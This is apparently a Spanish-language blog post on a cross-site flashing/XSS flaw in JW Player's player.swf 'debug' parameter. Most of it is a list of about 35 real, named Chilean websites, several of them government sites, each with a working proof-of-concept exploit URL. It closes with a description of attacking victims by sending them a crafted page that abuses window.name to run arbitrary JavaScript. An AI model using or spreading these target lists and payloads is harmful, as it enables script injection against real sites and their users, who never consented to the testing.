Buscando sitios chilenos que tuvieran presente JW Player y revisando si la versión era vulnerable, o habia sido actualizada o fixeada para Cross site Flashing | XSS , gracias a un pequeño script en perl y a Google di con unos sitios los cuales se ven afectados por esta vulnerabilidad.
Lista de sitios Chilenos Afectados:
TOP 8 || GOB y sitios conocidos
http://hacienda.gov.cl/js/jwplayer/player.swf?debug=alert%28/XSFF/%29 http://www.adnradio.cl/jwplayer/player.swf?debug=alert%28%22XSFF%22%29 http://www.24horas.cl/skins/24horas/gfx/jwplayer/jwplayer.swf?debug=alert%28%22XSFF%22%29 http://www.despegapyme.cl/js/jwplayer/player.swf?debug=alert%28%22XSFF%22%29 https://gondwana.cl/~gondwana/plugins/muscolplayers/jwplayer/jwplayer/player.swf?debug=alert%28%22XSFF%22%29 http://www.gobiernosantiago.cl/jwplayer/player.swf?debug=alert%28%22XSFF%22%29 http://www.iansa.cl/wp-content/themes/IANSA-2010/jwplayer/player.swf?debug=alert%28%22XSFF%22%29 http://www.ccu.cl/wp/wp-content/themes/CCU-2011/jwplayer/player.swf?debug=alert%28%22XSFF%22%29 http://www.cruzverde.cl/rps_cruzverde_v60/opensite/Cruz%20Verde%20Internet/style/images/guateros-peluche/jwplayer/player.swf?debug=alert%28%22XSFF%22%29MAS ....
http://www.suralim.cl/wp-content/themes/suralim-2011/jwplayer/player.swf?debug=alert%28%22XSFF%22%29 http://onirika.cl/web/wp-content/themes/vernissage/js/jwplayer/player.swf?debug=alert%28%22XSFF%22%29 http://www.atmosferas.cl/jwplayer/player.swf?debug=alert%28%22XSFF%22%29 http://www.riomagico.cl/wp-content/themes/slash/js/jwplayer/player.swf?debug=alert%28%22XSFF%22%29 http://www.jokers.cl/jwplayer/player.swf?debug=alert%28%22XSFF%22%29 http://elearning.ucsh.cl/dokeos/main/inc/lib/jwplayer/player.swf?debug=alert%28%22XSFF%22%29 http://www.espaciourbano.cl/scripts/jwplayer/player.swf?debug=alert%28%22XSFF%22%29 http://www.b2publicidad.cl/portal1/jwplayer/player.swf?debug=alert%28%22XSFF%22%29 http://www.ptovaras.cl/web2/jwplayer/player.swf?debug=alert%28%22XSFF%22%29 http://www.radiounochile.cl/jwplayer/player.swf?debug=alert%28%22XSFF%22%29 http://www.semanadelachilenidad.cl/js_global/jquery/plugins/jwplayer/player.swf?debug=alert%28%22XSFF%22%29 https://fol.cl/Content/jwplayer/player.swf?debug=alert%28%22XSFF%22%29 http://casalerelacionescomunitarias.cl/nivelacion_estudios/jwplayer/player.swf?debug=alert%28%22XSFF%22%29 http://www.gamtv.cl/wp-content/themes/gamtv/scripts/jwplayer/player.swf?debug=alert%28%22XSFF%22%29 http://www.nosk.cl/js/jwplayer/player.swf?debug=alert%28%22XSFF%22%29 http://www.saludv.cl/javascript/jwplayer/player.swf?debug=alert%28%22XSFF%22%29 http://www.simmarent.cl/jwplayer/player.swf?debug=alert%28%22XSFF%22%29 http://www.webgo.cl/wp-content/themes/webgo/js/jwplayer/player.swf?debug=alert%28%22XSFF%22%29 https://www.fondosonline.cl/Content/jwplayer/player.swf?debug=alert%28%22XSFF%22%29 http://www.nevasa.cl/wp-content/uploads/jwplayer/player.swf?debug=alert%28%22XSFF%22%29 http://www.caballoyrodeo.cl/js_global/jquery/plugins/jwplayer/player.swf?debug=alert%28%22XSFF%22%29 http://www.attic.cl/jwplayer/player.swf?debug=alert%28%22XSFF%22%29 http://maiporafting.cl/jwplayer/player.swf?debug=alert%28%22XSFF%22%29 http://home.cambio21.cl/cambio21/js-local/jquery/plugins/jwplayer/player.swf?debug=alert%28%22XSFF%22%29 http://www.maspack.cl/js/jwplayer/player.swf?debug=alert%28%22XSFF%22%29 http://www.procleanmg.cl/jwplayer/player.swf?debug=alert%28%22XSFF%22%29
Sigamos, también es posible explotar via "window.name" como se nos muestra en Example
de la siguiente forma :
Subimos este .html, y lo enviamos a una victima ejecutamndo código javascript, solo queda imaginación. Otro Researcher, que toca este tema es Dedalo @SeguridadBlanca es su blogExample 1:
This example simply uses javascript:alert(1) as the value in window.name to make the playerReady function take the value of it Click Me
Finish!#
2 comentarios:
Shinee puedes hacer un paso a paso explicando para aprender.
Publicar un comentario